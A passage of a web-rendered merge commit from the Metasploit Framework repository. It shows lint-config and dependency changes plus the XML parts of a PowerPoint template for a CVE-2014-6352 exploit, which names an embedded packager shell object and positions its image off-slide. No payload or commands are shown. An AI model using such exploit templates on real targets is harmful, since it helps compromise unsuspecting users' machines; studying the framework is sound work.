github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00
Code Releases Activity

Merge branch 'master' into staging/rails-4.0

Browse Source 
Conflicts:
	Gemfile.lock
	db/schema.rb
	metasploit-framework-db.gemspec
This commit is contained in:
Matt Buck 2014-12-02 09:47:47 -06:00
commit 0249e0a800
No known key found for this signature in database
GPG Key ID: 42134E0C9C4E94BB
142 changed files with 3179 additions and 1423 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
.rubocop.yml
View File

@ -8,7 +8,7 @@
# inherit_from: .rubocop_todo.yml
Style/ClassLength:
Metrics/ClassLength:
Description: 'Most Metasploit modules are quite large. This is ok.'
Enabled: true
Exclude:
@ -25,14 +25,14 @@ Style/Encoding:
Description: 'We prefer binary to UTF-8.'
EnforcedStyle: 'when_needed'
Style/LineLength:
Metrics/LineLength:
Description: >-
Metasploit modules often pattern match against very
long strings when identifying targets.
Enabled: true
Max: 180
Style/MethodLength:
Metrics/MethodLength:
Enabled: true
Description: >-
While the style guide suggests 10 lines, exploit definitions
@ -44,6 +44,11 @@ Style/MethodLength:
Style/Encoding:
Enabled: false
# %q() is super useful for long strings split over multiple lines and
# is very common in module constructors for things like descriptions
Style/UnneededPercentQ:
Enabled: false
Style/NumericLiterals:
Enabled: false
Description: 'This often hurts readability for exploit-ish code.'

8
CHANGELOG.md Normal file
View File

@ -0,0 +1,8 @@
# Changelog
# Next Release
* Enhancements
* [#4045](https://github.com/rapid7/metasploit-framework/pull/4045): Reorganize Msf::Module into submodule of related methods to reduce file size and allow for easier understanding of functionality - [@limhoff-r7](https://github.com/limhoff-r7)
* Bug Fixes
* Deprecations
* Incompatible Changes

4
Gemfile.lock
View File

@ -57,7 +57,7 @@ PATH
bcrypt
jsobfu (~> 0.2.0)
json
meterpreter_bins (= 0.0.10)
meterpreter_bins (= 0.0.11)
msgpack
nokogiri
packetfu (= 1.1.9)
@ -153,7 +153,7 @@ GEM
json (1.8.1)
mail (2.6.1)
mime-types (>= 1.16, < 3)
meterpreter_bins (0.0.10)
meterpreter_bins (0.0.11)
method_source (0.8.2)
mime-types (1.25.1)
mini_portile (0.6.0)

2
data/exploits/CVE-2014-6352/template_run_as_admin/[Content_Types].xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

2
data/exploits/CVE-2014-6352/template_run_as_admin/_rels/.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/thumbnail" Target="docProps/thumbnail.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="ppt/presentation.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/docProps/app.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template></Template><TotalTime>37</TotalTime><Words>2</Words><Application>Microsoft Office PowerPoint</Application><PresentationFormat>On-screen Show (4:3)</PresentationFormat><Paragraphs>2</Paragraphs><Slides>1</Slides><Notes>0</Notes><HiddenSlides>0</HiddenSlides><MMClips>0</MMClips><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="6" baseType="variant"><vt:variant><vt:lpstr>Theme</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant><vt:variant><vt:lpstr>Embedded OLE Servers</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant><vt:variant><vt:lpstr>Slide Titles</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="3" baseType="lpstr"><vt:lpstr>Office Theme</vt:lpstr><vt:lpstr>Packager Shell Object</vt:lpstr><vt:lpstr>Example</vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>14.0000</AppVersion></Properties>

2
data/exploits/CVE-2014-6352/template_run_as_admin/docProps/core.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title>Example</dc:title><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>9</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2014-08-06T07:56:10Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-12T06:36:10Z</dcterms:modified></cp:coreProperties>

BIN
data/exploits/CVE-2014-6352/template_run_as_admin/docProps/thumbnail.jpeg Executable file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.0 KiB

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/_rels/presentation.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/_rels/vmlDrawing1.vml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.wmf"/></Relationships>

31
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml Executable file
View File

@ -0,0 +1,31 @@
<xml xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:p="urn:schemas-microsoft-com:office:powerpoint"
xmlns:oa="urn:schemas-microsoft-com:office:activation">
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75"
o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="_x0000_s1034" type="#_x0000_t75" style='position:absolute;left:100pt;top:-100pt;width:30pt;height:30pt'>
<v:fill color="white" opacity="1" on="f" type="solid"/>
<v:stroke on="f"/>
<v:imagedata o:relid="rId1" o:title="" croptop="0" cropbottom="0" cropleft="0"
cropright="0" grayscale="f" bilevel="f"/>
<o:lock v:ext="edit" aspectratio="t" position="f" selection="f" grouping="f"/>
</v:shape></xml>

BIN
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/media/image1.wmf Executable file
View File

Binary file not shown.

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:presentationPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:extLst><p:ext uri="{E76CE94A-603C-4142-B9EB-6D1370010A27}"><p14:discardImageEditData xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="0"/></p:ext><p:ext uri="{D31A062A-798A-4329-ABDD-BBA856620510}"><p14:defaultImageDpi xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220"/></p:ext><p:ext uri="{FD5EFAAD-0ECE-453E-9831-46B23BE46B34}"><p15:chartTrackingRefBased xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="" val="0"/></p:ext></p:extLst></p:presentationPr>

13
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml Executable file
View File

@ -0,0 +1,13 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" saveSubsetFonts="1"><p:sldMasterIdLst><p:sldMasterId id="2147483648" r:id="rId1"/></p:sldMasterIdLst><p:sldIdLst><p:sldId id="256" r:id="rId2"/></p:sldIdLst><p:sldSz cx="9144000" cy="6858000" type="screen4x3"/><p:notesSz cx="6858000" cy="9144000"/><p:defaultTextStyle><a:defPPr><a:defRPr lang="en-US"/></a:defPPr><a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"><a:defRPr sz="1800" kern="1200"><a:solidFill><a:schemeClr val="tx1"/></a:solidFill><a:latin typeface="+mn-lt"/><a:ea typeface="+mn-ea"/><a:cs typeface="+mn-cs"/></a:defRPr></a:lvl9pPr></p:defaultTextStyle><p:extLst><p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}"><p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="">
<p15:guide id="1" orient="horz" pos="2160">
<p15:clr>
<a:srgbClr val="A4A3A4"/>
</p15:clr>
</p15:guide>
<p15:guide id="2" pos="2880">
<p15:clr>
<a:srgbClr val="A4A3A4"/>
</p15:clr>
</p15:guide>
</p15:sldGuideLst></p:ext></p:extLst></p:presentation>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/></Relationships>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="title" preserve="1"><p:cSld name="Title Slide"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ctrTitle"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="685800" y="2130425"/><a:ext cx="7772400" cy="1470025"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Subtitle 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="subTitle" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1371600" y="3886200"/><a:ext cx="6400800" cy="1752600"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0" algn="ctr"><a:buNone/><a:defRPr><a:solidFill><a:schemeClr val="tx1"><a:tint val="75000"/></a:schemeClr></a:solidFill></a:defRPr></a:lvl9pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master subtitle style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Date Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Footer Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

2
data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml Executable file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="vertTx" preserve="1"><p:cSld name="Title and Vertical Text"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Vertical Text Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" orient="vert" idx="1"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr vert="eaVert"/><a:lstStyle/><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr 